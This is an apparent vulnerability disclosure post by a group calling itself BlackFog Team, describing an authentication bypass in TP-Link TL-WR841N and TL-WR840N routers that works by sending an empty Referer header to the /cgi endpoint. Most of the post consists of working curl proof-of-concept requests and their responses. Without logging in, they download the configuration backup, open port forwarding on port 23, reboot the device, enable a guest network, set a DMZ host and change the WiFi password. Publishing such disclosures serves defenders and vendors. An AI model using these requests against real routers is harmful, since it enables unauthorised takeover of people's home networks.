Time to Disable TP-Link Home WiFi Router

Hello Folks,

We are BlackFog Team, some days before one of our team member found a very interesting bug in TP-Links Wifi Home Routers which gives full permission on a router without login to the router’s admin panel.  In short, we can Bypass the Authentication Mechanism just using a simple trick.


  • Vendor Description
  • Vulnerable Routers and Version
  • Attack Description
  • PoC
  • Explore More  (Authentication Bypass)
  • Fix
  • Timeline

Vendor Description

TP-Link is the world’s #1 provider of consumer WiFi networking devices, shipping products to over 120 countries and hundreds of millions of customers. (source https://www.tp-link.com/)

Vulnerable Routers and Version

Hardware: TL-WR841N v13 00000013
Firmware Version: 0.9.1 4.16 v0001.0 Build 170622 Rel.64334n

Hardware: TL-WR840N v5 00000005
Firmware Version: 0.9.1 3.16 v0001.0 Build 170608 Rel.58696n

Attack Description

This issue is caused by improper session handling on /cgi/ Folder or /cgi file, This bug found by Touhid Shaikh. if an attacker sends Referer Header with its request and sets Referer: than its no authentication required and an attacker can do router’s action without authentication. below are some of few examples you can see. But the attacker can do mostly all of the action on a router without Authentication.

NOTE: Except admin’s password change because of its required current password for changing.


In This PoC our Team try to download router’s Backup file which contains all setting information within BIN extension file format.

Below we show FAIL and the SUCCESSFUL attempt which tried by our team.

—————————————- FAIL ———————————-
root@linux:/workspace# curl -i -s -k -X GET
HTTP/1.1 403 Forbidden
Content-Type: text/html; charset=utf-8
Content-Length: 106
Connection: close

<html><head><title>403 Forbidden</title></head><body><center><h1>403


———————————– SUCCESSFUL  —————————-
root@linux:/workspace# curl -i -s -k -X GET -H “Referer:”
HTTP/1.1 200 OK
Content-Type: application/octet-stream; charset=utf-8
Content-Length: 5984
Connection: keep-alive

root@linux:/workspace# curl -s -k -X GET -H “Referer:” > backup.bin
root@linux:/workspace# file backup.bin
backup.bin: data
root@linux:/workspace# ls -la backup.bin
-rw-r–r– 1 root root 5720 Mar 30 17:17 backup.bin

Explore More (Authentication Bypass)

After successfully download Backup file our team try to do more action on the router. Using above PoC trick,

Below we successfully manage and do some action on a router.

=========== Add Port Forwarding ============

curl -i -s -k -X POST -H "Host:" -H "User-Agent:Mozilla/Agent22" -H 'Accept: */*' -H "Referer:" --data-binary $'[IP_CONN_PORTTRIGGERING#0,0,0,0,0,0#1,1,2,0,0,0]0,5\x0d\x0atriggerPort=23\x0d\x0atriggerProtocol=TCP or UDP\x0d\x0aopenProtocol=TCP or UDP\x0d\x0aenable=1\x0d\x0aopenPort=23\x0d\x0a'

HTTP/1.1 200 OK
Content-Type: text/plain; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive

triggerProtocol=TCP or UDP
openProtocol=TCP or UDP

—– Decription —–
enable=0 is for disable
enable=1 is for enable
u can change port also.

=============== Reboot Router =====================

curl -i -s -k -X POST -H "Host:" -H "User-Agent:Mozilla/Agent22" -H 'Accept: */*' -H "Referer:" --data-binary $'[ACT_REBOOT#0,0,0,0,0,0#0,0,0,0,0,0]0,0\x0d\x0a'

HTTP/1.1 200 OK
Content-Type: text/plain; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive


—-Description —–
error = 0 means reboot seccessully

============= Enable Guest Network =====================

curl -i -s -k -X $'POST' -H $'Host:' -H $'User-Agent: Aent22' -H $'Accept: */*' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'Content-Type: text/plain' -H $'Referer:' -H $'Content-Length: 844' -H $'Connection: close' --data-binary $'[LAN_WLAN_MULTISSID#1,1,0,0,0,0#0,0,0,0,0,0]0,1\x0d\x0amultiSSIDEnable=1\x0d\x0a[LAN_WLAN_MSSIDENTRY#1,1,1,0,0,0#0,0,0,0,0,0]1,11\x0d\x0aIsolateClients=0\x0d\x0aEnable=1\x0d\x0aSSID=Agent22\x0d\x0aBeaconType=WPAand11i\x0d\x0aWPAAuthenticationMode=PSKAuthentication\x0d\x0aWPAEncryptionModes=TKIPandAESEncryption\x0d\x0aIEEE11iAuthenticationMode=PSKAuthentication\x0d\x0aIEEE11iEncryptionModes=TKIPandAESEncryption\x0d\x0aPreSharedKey=9876543210\x0d\x0aGroupKeyUpdateInterval=0\x0d\x0aMaxStaNum=32\x0d\x0a[LAN_WLAN_MSSIDENTRY#1,2,1,0,0,0#0,0,0,0,0,0]2,1\x0d\x0aIsolateClients=0\x0d\x0a[LAN_WLAN_GUESTNET#1,1,0,0,0,0#0,0,0,0,0,0]3,8\x0d\x0aLANAccessEnable=1\x0d\x0aUSBAccessEnable=0\x0d\x0aTCEnable=0\x0d\x0aTCMinUpBW=100\x0d\x0aTCMaxUpBW=200\x0d\x0aTCMinDownBW=100\x0d\x0aTCMaxDownBW=200\x0d\x0alastModified=1\x0d\x0a[LAN_WLAN_GUESTNET#1,2,0,0,0,0#0,0,0,0,0,0]4,8\x0d\x0aLANAccessEnable=1\x0d\x0aUSBAccessEnable=0\x0d\x0aTCEnable=0\x0d\x0aTCMinUpBW=100\x0d\x0aTCMaxUpBW=200\x0d\x0aTCMinDownBW=100\x0d\x0aTCMaxDownBW=200\x0d\x0alastModified=0\x0d\x0a' $''

——- Description ———-

======= DMZ enable and Disable on ===========

curl -i -s -k -X $'POST' -H $'Host:' -H $'User-Agent: Agent22' -H $'Referer:' -H $'Content-Length: 78' -H $'Connection: close' --data-binary $'[DMZ_HOST_CFG#0,0,0,0,0,0#0,0,0,0,0,0]0,2\x0d\x0aenable=1\x0d\x0aIPAddress=\x0d\x0a' $''

HTTP/1.1 200 OK
Content-Type: text/plain; charset=utf-8
Transfer-Encoding: chunked
Connection: close


——-Description ———–
enable=1 or 0 (enable or disable)

=============== WiFi Password Change =============

curl -i -s -k -X $'POST' -H $'Host:' -H $'User-Agent: Agent22' -H $'Accept-Encoding: gzip, deflate' -H $'Content-Type: text/plain' -H $'Referer:' -H $'Content-Length: 199' -H $'Connection: close' --data-binary $'[LAN_WLAN#1,1,0,0,0,0#0,0,0,0,0,0]0,5\x0d\x0aBeaconType=11i\x0d\x0aIEEE11iAuthenticationMode=PSKAuthentication\x0d\x0aIEEE11iEncryptionModes=AESEncryption\x0d\x0aX_TP_PreSharedKey=9876543210\x0d\x0aX_TP_GroupKeyUpdateInterval=0\x0d\x0a' $''

——-Description ———–


Update most latest Firmware today. 😉


30 Mar, 2018 —– Initial Report (support.in@tp-link.com) (No Response)
27 May, 2018 —– Full Disclosure (Exploit-DB)


Don’t use our PoC for Evil activity. we are not responsible for any Damage and we are not support any malicious  activity.

Thank you for reading.